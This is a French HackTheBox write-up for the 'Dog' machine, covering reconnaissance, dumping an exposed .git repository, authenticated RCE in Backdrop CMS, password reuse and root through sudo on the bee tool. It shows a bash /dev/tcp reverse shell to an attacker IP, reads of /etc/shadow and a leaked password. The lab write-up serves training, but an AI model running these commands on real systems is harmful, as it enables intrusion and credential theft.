Dog HackTheBox (WriteUp)

Skills:

Extracting information from .git folder (Information Leakage)
Authenticated Remote Code Execution (CMS Backdrop)
Pivoting (Password Reuse)
Sudo bee binary (Executing PHP Code) [Privilege Escalation]

Reconnaissance:

Création de l'espace de travail :

Nous établirons notre espace de travail en créant trois dossiers pour stocker les contenus importants, les exploits et les résultats de la reconnaissance à l'aide de Nmap.

Vérification de la Connectivité VPN

Vérification de la connexion VPN pour assurer une communication stable avec la machine cible.

Recherche des ports ouverts avec Nmap :

Exploration des ports ouverts et exportation dans le fichier "allPorts" dans le répertoire Nmap:

nmap -p- --open -sS -n -Pn -vvv --min-rate 5000 10.10.11.58 -oG allPorts

Scan de la version des ports avec Nmap 22,80:

Utilisation de Nmap pour scanner la version des ports et extraction des informations dans le fichier "targeted" :

nmap -sCV -p22,80 10.10.11.58 -oN targeted

Port 80 - HTTP

Nous découvrons un répertoire .git, indiquant un potentiel dépôt Git accessible publiquement. Le site utilise le CMS Backdrop.

Enumeration avec Gobuster

gobuster dir -u http://10.10.11.58 -w /usr/share/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 100

Nous trouvons plusieurs répertoires intéressants, dont .git.

Dump du dépôt Git

Nous récupérons le contenu du dépôt avec :

git-dumper http://10.10.11.58/.git .git

Nous trouvons un fichier settings.php contenant un mot de passe :

Nous effectuons une recherche sur les emails enregistrés avec :

find .git -type f -exec grep -E '@dog' {} +

Nous trouvons l'email suivant : [email protected].

Exploitation du CMS Backdrop (RCE)

Nous utilisons les identifiants trouvés pour nous connecter au CMS.

Recherche de vulnérabilités

Avec searchsploit, nous identifions une faille RCE :

searchsploit -m php/webapps/52021.py

Nous exécutons l'exploit :

python3 52021.py http://10.10.11.58

Cela génère un fichier ZIP contenant un shell PHP.

Nous compressons ensuite le shell en tar.gz :

tar -czvf shell.tar.gz shell

Nous l'injectons via admin / installer / manual.

Exécution des commandes

Nous trouvons un dossier modules/cmd/ contenant cmd.php

Nous permettant d'exécuter des commandes :

ifconfig

Reverse Shell Backdrop CMS

Nous ouvrons un listener sur le port 443 :

nc -nlvp 443

Nous injectons un payload :

bash -c "bash -i >&/dev/tcp/10.10.14.81/443 0>&1"

Une fois connecté, nous stabilisons notre shell :

script /dev/null -c bash
#contrôle Z

stty raw -echo; fg
reset xterm
export TERM=xterm
export SHELL=bash
stty rows 44 columns 184

Escalade de privilèges

Pivoting vers l'utilisateur johncusack

Nous listons les utilisateurs ayant un shell Bash valide :

cat /etc/passwd | grep "/bash"

Nous trouvons root, jobert et johncusack.

Nous tentons une réutilisation des identifiants et obtenons un accès avec :

su johncusack
BackDropJ2024DS2024

Flag user.txt :)

Escalade de privilèges avec le binaire Bee

Nous vérifions les privilèges sudo :

sudo -l

Nous pouvons exécuter /usr/local/bin/bee en tant que root.

Analyse de Bee

Bee est un outil d'administration pour Backdrop CMS, similaire à Drush pour Drupal. Il permet l'exécution de diverses commandes.

Usage: bee [global-options] [options] [arguments]

Nous identifions l'option eval, qui permet d'exécuter du code PHP arbitraire.

Lecture de /etc/shadow

sudo /usr/local/bin/bee --root=/var/www/html eval 'echo shell_exec("cat /etc/shadow 2>&1");'

Obtention d'un shell root

sudo /usr/local/bin/bee --root=/var/www/html eval 'shell_exec("/bin/bash -p");'

Mis à jour il y a 9 mois

Ce contenu vous a-t-il été utile ?